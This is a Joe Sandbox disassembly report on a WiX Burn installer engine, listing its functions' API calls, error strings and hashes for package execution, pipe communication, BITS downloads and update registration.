Failed to execute dependency action., xrefs: 000B9D08
Cache thread exited unexpectedly., xrefs: 000B9E14
Failed to execute MSP package., xrefs: 000B9C9D
apply.cpp, xrefs: 000B9DAC, 000B9DF6
Failed to load compatible package on per-machine package., xrefs: 000B9D2E
Failed to execute EXE package., xrefs: 000B9C4F
Failed to execute compatible package action., xrefs: 000B9D45
Failed to execute package provider registration action., xrefs: 000B9CE9
Failed to get cache thread exit code., xrefs: 000B9E03
Failed to wait for cache check-point., xrefs: 000B9DB9
Invalid execute action., xrefs: 000B9E23
Failed to execute MSI package., xrefs: 000B9C78

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
API String ID: 3703294532-2662572847
Opcode ID: b6f2bc0d6037223892351e78bfa41df6012b77c7cab60557d53a7e7343119739
Instruction ID: 3b6349a976c8e7926363772d819fa6365818f851029bc7aa3553480ecb003a23
Opcode Fuzzy Hash: b6f2bc0d6037223892351e78bfa41df6012b77c7cab60557d53a7e7343119739
Instruction Fuzzy Hash: C1716C71A01259EFDB14CF65C941EFEBBF8EB08710F11456ABA15FB281D370AE009BA0

Function 000BCA34 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 173processCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(74DE8FB0,00000002,00000000), ref: 000BCA40

Part of subcall function 000A4B96: UuidCreate.RPCRT4(?), ref: 000A4BC9

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,000B21A5,?,?,00000000,?,?,?), ref: 000BCB1E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 000BCB28
GetProcessId.KERNEL32(000B21A5,?,?,00000000,?,?,?,?), ref: 000BCB60

Part of subcall function 000A52E3: lstrlenW.KERNEL32(?,?,00000000,?,000DB4F0,?,00000000,?,0009442A,?,000DB4F0), ref: 000A5304
Part of subcall function 000A52E3: GetCurrentProcessId.KERNEL32(?,0009442A,?,000DB4F0), ref: 000A530F
Part of subcall function 000A52E3: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0009442A,?,000DB4F0), ref: 000A5346
Part of subcall function 000A52E3: ConnectNamedPipe.KERNEL32(?,00000000,?,0009442A,?,000DB4F0), ref: 000A535B
Part of subcall function 000A52E3: GetLastError.KERNEL32(?,0009442A,?,000DB4F0), ref: 000A5365
Part of subcall function 000A52E3: Sleep.KERNEL32(00000064,?,0009442A,?,000DB4F0), ref: 000A5396
Part of subcall function 000A52E3: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0009442A,?,000DB4F0), ref: 000A53B9
Part of subcall function 000A52E3: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0009442A,?,000DB4F0), ref: 000A53D4
Part of subcall function 000A52E3: WriteFile.KERNEL32(?,*D,000DB4F0,00000000,00000000,?,0009442A,?,000DB4F0), ref: 000A53EF
Part of subcall function 000A52E3: WriteFile.KERNEL32(?,comres.dll,00000004,feclient.dll,00000000,?,0009442A,?,000DB4F0), ref: 000A540A

Part of subcall function 000D0917: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00094E16,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 000D0927
Part of subcall function 000D0917: GetLastError.KERNEL32(?,?,00094E16,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 000D0935

CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,000BC992,?,?,?,?,?,00000000,?,?,?,?), ref: 000BCBE4
CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,000BC992,?,?,?,?,?,00000000,?,?,?,?), ref: 000BCBF3
CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,000BC992,?,?,?,?,?,00000000,?,?,?), ref: 000BCC0A

Strings

Failed to create embedded process at path: %ls, xrefs: 000BCB56
Failed to wait for embedded process to connect to pipe., xrefs: 000BCB82
Failed to wait for embedded executable: %ls, xrefs: 000BCBC7
Failed to allocate embedded command., xrefs: 000BCAF7
Failed to create embedded pipe name and client token., xrefs: 000BCAA3
Failed to create embedded pipe., xrefs: 000BCACA
Failed to process messages from embedded message., xrefs: 000BCBA7
burn.embedded, xrefs: 000BCADB
%ls -%ls %ls %ls %u, xrefs: 000BCAE3
embedded.cpp, xrefs: 000BCB49

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
API String ID: 875070380-3803182736
Opcode ID: ce933b2c30d857d3ae4f85467c108386fec42a21ff3ec0571f7c6ddddf8bbff8
Instruction ID: d7fb440e70d76c043ff0d4043fd568553301ed9e7702bf6cd04d8886f5fce62b
Opcode Fuzzy Hash: ce933b2c30d857d3ae4f85467c108386fec42a21ff3ec0571f7c6ddddf8bbff8
Instruction Fuzzy Hash: 7B517172D4021DBBEF11EBA4DC42FEEBBB8EF04710F100122FA04B6191DB759A419BA1

Function 000A4933 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 155sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 000A498D
GetLastError.KERNEL32 ref: 000A499B
Sleep.KERNEL32(00000064), ref: 000A49BF

Strings

, feature: %2!ls!, state: %3!hs!, xrefs: 000A4AA5
feclient.dll, xrefs: 000A49F2, 000A4A8D, 000A4AA1, 000A4AE5
Failed to allocate name of parent pipe., xrefs: 000A4959
Failed to open parent pipe: %ls, xrefs: 000A49E5
Failed to allocate name of parent cache pipe., xrefs: 000A4A34
\\.\pipe\%ls.Cache, xrefs: 000A4A20
Failed to open companion process with PID: %u, xrefs: 000A4AE7
\\.\pipe\%ls, xrefs: 000A4945
pipe.cpp, xrefs: 000A49D8, 000A4ADB
Failed to verify parent pipe: %ls, xrefs: 000A4A07

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CreateErrorFileLastSleep
String ID: , feature: %2!ls!, state: %3!hs!$Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
API String ID: 408151869-2209835988
Opcode ID: 4a53dade6b90826a741882fc156ae28dcfd88ae7df474d14e36dafe4b27fbfad
Instruction ID: 655907dc1242331a48fd2b9bd7ef80b9aaaa746c85fca13e59cbf73a6f0c2633
Opcode Fuzzy Hash: 4a53dade6b90826a741882fc156ae28dcfd88ae7df474d14e36dafe4b27fbfad
Instruction Fuzzy Hash: 59412B3AD80731FFEB2156E58C06B9BBA98AF01720F110221FD14FA1D1D7B59D1096E5

Function 000D7E36 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 153stringCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,?,000D8320,00000001,?), ref: 000D7E56
CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,000D8320,00000001,?), ref: 000D7E71
CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,000D8320,00000001,?), ref: 000D7E8C
CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,000D8320,00000001,?), ref: 000D7EF8
CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,000D8320,00000001,?), ref: 000D7F1C
CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,000D8320,00000001,?), ref: 000D7F40
CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,000D8320,00000001,?), ref: 000D7F60
lstrlenW.KERNEL32(006C0064,?,000D8320,00000001,?), ref: 000D7F7B

Strings

apuputil.cpp, xrefs: 000D7F93
digest, xrefs: 000D7E68
sha1, xrefs: 000D7F37
algorithm, xrefs: 000D7EEF
name, xrefs: 000D7E83
md5, xrefs: 000D7F13
msi.dll, xrefs: 000D7E50
http://appsyndication.org/2006/appsyn, xrefs: 000D7E49
sha256, xrefs: 000D7F57

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareString$lstrlen
String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
API String ID: 1657112622-2492263259
Opcode ID: 55463747dcbe5bc91927ac2ee0177625f40fd6094a0c5cbf6007d6fd1012779e
Instruction ID: 089ad31d8619f32d76547680f0c8e8e23694bf2a7cd2fec76a514ecbfdf49793
Opcode Fuzzy Hash: 55463747dcbe5bc91927ac2ee0177625f40fd6094a0c5cbf6007d6fd1012779e
Instruction Fuzzy Hash: 5F514F3164C312BBEB304F54CC46F667B61AB15730F204356FA38AE6D5D765EC909BA0

Function 00099F2B Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 216COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00099FA3

Strings

AssignmentType, xrefs: 00099F7E
Failed to copy upgrade code., xrefs: 0009A003
Trying per-user extended info for property '%ls' for product: %ls, xrefs: 0009A062
Failed to format GUID string., xrefs: 00099FAE
Product or related product not found: %ls, xrefs: 0009A08E
MsiProductSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0009A141
Trying per-machine extended info for property '%ls' for product: %ls, xrefs: 0009A035
Language, xrefs: 00099F8C
Failed to enumerate related products for upgrade code., xrefs: 00099FDE
Failed to get product info., xrefs: 0009A0D5
VersionString, xrefs: 00099F93, 0009A01E, 0009A034, 0009A048, 0009A061, 0009A075
Failed to change value type., xrefs: 0009A10F
State, xrefs: 00099F85
Unsupported product search type: %u, xrefs: 00099F6B
Failed to set variable., xrefs: 0009A12E

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Open@16
String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
API String ID: 3613110473-2134270738
Opcode ID: 1681be066443c7a1e51f7d90653eaf151a8bf74e9d4ac9185462a085d4ae9079
Instruction ID: 01ab4fc6fb8385faf662cf8bf388a585a2b5b27f88fe0b0fe32b9a2db1769e64
Opcode Fuzzy Hash: 1681be066443c7a1e51f7d90653eaf151a8bf74e9d4ac9185462a085d4ae9079
Instruction Fuzzy Hash: 5061E732E40219BBCF21AEA8C945EEE7BB9EB45710F104166F504BF251C632DE40B7E2

Function 000BDC0D Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 204stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,000B9751,75C08550,?,?,00000000,?,?,?,00000001,00000000,?), ref: 000BDC28

Strings

Failed to initialize BITS job callback., xrefs: 000BDD49
Failed to create BITS job callback., xrefs: 000BDD3B
Failed to complete BITS job., xrefs: 000BDDD2
Falied to start BITS job., xrefs: 000BDDE0
Failed to copy download URL., xrefs: 000BDC6F
Failed to add file to BITS job., xrefs: 000BDCF5
Failed while waiting for BITS download., xrefs: 000BDDD9
Failed to set credentials for BITS job., xrefs: 000BDCD6
Failed to download BITS job., xrefs: 000BDDBF
Failed to set callback interface for BITS job., xrefs: 000BDD60
Failed to create BITS job., xrefs: 000BDCB7
bitsengine.cpp, xrefs: 000BDC3E, 000BDD31
Invalid BITS engine URL: %ls, xrefs: 000BDC4A

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: lstrlen
String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
API String ID: 1659193697-2382896028
Opcode ID: c2284a96b7f98df1b66e0fca11bb92c9a72bad62c28d40a867488e90ba117d49
Instruction ID: 0842a84463c0df1cdb5f6646c9a38add9e606c3ec996758ea60420fc830661be
Opcode Fuzzy Hash: c2284a96b7f98df1b66e0fca11bb92c9a72bad62c28d40a867488e90ba117d49
Instruction Fuzzy Hash: 3C616F35A44229EBCB21AB94C885EEEFBA4AF04B50B114157FE04AF256F771DD00AB91

Function 0009EBB2 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 173COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 0009ED40

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

SysFreeString.OLEAUT32(?), ref: 0009ECF8

Strings

Failed to convert SoftwareTag text to UTF-8, xrefs: 0009ED75
Filename, xrefs: 0009EC73
Regid, xrefs: 0009EC8E
Failed to get @Filename., xrefs: 0009ED9D
Failed to get @Regid., xrefs: 0009ED93
Failed to get SoftwareTag text., xrefs: 0009ED7F
Failed to select software tag nodes., xrefs: 0009EBE2
Failed to get next node., xrefs: 0009EDA7
Failed to allocate memory for software tag structs., xrefs: 0009EC3F
registration.cpp, xrefs: 0009EC35
Path, xrefs: 0009ECA6
SoftwareTag, xrefs: 0009EBC1
Failed to get @Path., xrefs: 0009ED89
Failed to get software tag count., xrefs: 0009EC07

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$registration.cpp
API String ID: 336948655-1068704183
Opcode ID: 1ff5c94b131cf0c0a0e68726d43af59d94156fcc4a81fe67c36a918050ea01a9
Instruction ID: a79f6813b29ce0474b8694e984eb5592f7d26bdea62c4c941f7c3c99536890dc
Opcode Fuzzy Hash: 1ff5c94b131cf0c0a0e68726d43af59d94156fcc4a81fe67c36a918050ea01a9
Instruction Fuzzy Hash: CC51BF75A02369AFDF20DF55C895EEEBBA8AF04710F100169F905BB241CB71DE00ABA0

Function 0009F410 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 152registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,000A0348,InstallerVersion,InstallerVersion,00000000,000A0348,InstallerName,InstallerName,00000000,000A0348,Date,InstalledDate,00000000,000A0348,LogonUser), ref: 0009F5BE

Part of subcall function 000D1392: RegSetValueExW.ADVAPI32(00020006,00020006,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0009F1C2,00000000,?,00020006), ref: 000D13C5

Strings

Failed to create the key for update registration., xrefs: 0009F45E
Failed to get the formatted key path for update registration., xrefs: 0009F432
ThisVersionInstalled, xrefs: 0009F46A, 0009F47D
PackageName, xrefs: 0009F48A, 0009F49D
InstallerVersion, xrefs: 0009F58C, 0009F591, 0009F592, 0009F5A2
Failed to write %ls value., xrefs: 0009F5A7
InstallerName, xrefs: 0009F56F, 0009F574, 0009F575, 0009F585
PublishingGroup, xrefs: 0009F4F2, 0009F505
Date, xrefs: 0009F554
ReleaseType, xrefs: 0009F515, 0009F51A, 0009F529
LogonUser, xrefs: 0009F534
InstalledBy, xrefs: 0009F52F, 0009F548
InstalledDate, xrefs: 0009F54F, 0009F568
PackageVersion, xrefs: 0009F4AA, 0009F4BD
Publisher, xrefs: 0009F4CA, 0009F4DD

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseValue
String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
API String ID: 3132538880-2703781546
Opcode ID: 22f8821337e7d660a47cfee8be670c4ec1f4fa47af7861d695f9833cc8aa551c
Instruction ID: 7e54a9119dc9b9bab2d7302e638c16ee903d74f59635fd3e4ce3b0bbea25b0ee
Opcode Fuzzy Hash: 22f8821337e7d660a47cfee8be670c4ec1f4fa47af7861d695f9833cc8aa551c
Instruction Fuzzy Hash: 8E417831A41BA7BFDF225A51CC02EBE7A699B50710F164261FA00FA392D7619E10F790

Function 000B678F Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 150serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,bedded pipe name and client token.,?,?,00000000,?,?,?,?,?,?,?,?,000B6CE1,?), ref: 000B67C8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000B6CE1,?,?,?), ref: 000B67D5
OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,000B6CE1,?,?,?), ref: 000B681D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000B6CE1,?,?,?), ref: 000B6829
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,000B6CE1,?,?,?), ref: 000B6863
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000B6CE1,?,?,?), ref: 000B686D
CloseServiceHandle.ADVAPI32(00000000), ref: 000B6924
CloseServiceHandle.ADVAPI32(?), ref: 000B692E

Strings

Failed to mark WU service to start on demand., xrefs: 000B68F5
Failed to query status of WU service., xrefs: 000B689B
bedded pipe name and client token., xrefs: 000B67B5
Failed to open WU service., xrefs: 000B6857
msuengine.cpp, xrefs: 000B67F9, 000B684D, 000B6891
Failed to read configuration for WU service., xrefs: 000B68D4
Failed to open service control manager., xrefs: 000B6803
wuauserv, xrefs: 000B6817

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$bedded pipe name and client token.$msuengine.cpp$wuauserv
API String ID: 971853308-2457581958
Opcode ID: f4cdf5e3578d9d305e935f4139e05d0eb61b2201e3b9d6f368f1cf5ceb19a3cd
Instruction ID: c46b4718a5ae2f8f65c5ba58798b2bbd7c6b2170a575349e19a314d62a159909
Opcode Fuzzy Hash: f4cdf5e3578d9d305e935f4139e05d0eb61b2201e3b9d6f368f1cf5ceb19a3cd
Instruction Fuzzy Hash: 89418472B00314AFEB219BB99D45AEEB7E8EF48750F114526FD05FB251DB7ADC0086A0

Function 000AE563 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 135registryCOMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 000AE5AE
RegisterClassW.USER32(?), ref: 000AE5DA
GetLastError.KERNEL32 ref: 000AE5E5
CreateWindowExW.USER32(00000080,000E9CC4,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 000AE64C
GetLastError.KERNEL32 ref: 000AE656
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 000AE6F4

Strings

WixBurnMessageWindow, xrefs: 000AE5D3, 000AE6EF
uithread.cpp, xrefs: 000AE609, 000AE67A
Unexpected return value from message pump., xrefs: 000AE6DF
Failed to register window., xrefs: 000AE613
Failed to create window., xrefs: 000AE684

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: 28685af1e48aaa8d6901fc4ca4a53b6e968a7c12b5b030101f30b242928b180d
Instruction ID: 0c8404c6db70280b3b4349e499c497c0febf623b3c2badc0615b9e3168b85fe1
Opcode Fuzzy Hash: 28685af1e48aaa8d6901fc4ca4a53b6e968a7c12b5b030101f30b242928b180d
Instruction Fuzzy Hash: D1418076A01254EFEB209BE5DC44ADEBFE8FF09750F214126FD09EA290D7349900DBA1

Function 000BC517 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 272COMMON

Download Yara Rule

Strings

Failed to copy download source for passthrough pseudo bundle., xrefs: 000BC732
Failed to copy filename for passthrough pseudo bundle., xrefs: 000BC761
Failed to copy uninstall arguments for passthrough bundle package, xrefs: 000BC84F
Failed to allocate memory for pseudo bundle payload hash., xrefs: 000BC750
Failed to copy local source path for passthrough pseudo bundle., xrefs: 000BC75A
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 000BC78A
Failed to copy cache id for passthrough pseudo bundle., xrefs: 000BC7A8
Failed to copy install arguments for passthrough bundle package, xrefs: 000BC805
pseudobundle.cpp, xrefs: 000BC54B, 000BC744, 000BC77E
Failed to copy key for passthrough pseudo bundle., xrefs: 000BC72B
Failed to recreate command-line arguments., xrefs: 000BC7E6
Failed to copy related arguments for passthrough bundle package, xrefs: 000BC825
Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 000BC557
Failed to copy key for passthrough pseudo bundle payload., xrefs: 000BC768

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
API String ID: 1357844191-115096447
Opcode ID: 260a1133e8a3df63cc976a5c4ad81a091da69d9c1a131fb223d952d3beaa849c
Instruction ID: 84b7ed5a55a18cff8d729550701fa188a5b91e92ca2029545743f2dc92562bdc
Opcode Fuzzy Hash: 260a1133e8a3df63cc976a5c4ad81a091da69d9c1a131fb223d952d3beaa849c
Instruction Fuzzy Hash: 39B15A75A40616EFEB21DF24C881F99BBA1BF48710F114169FD14AB352CB31E921EF90

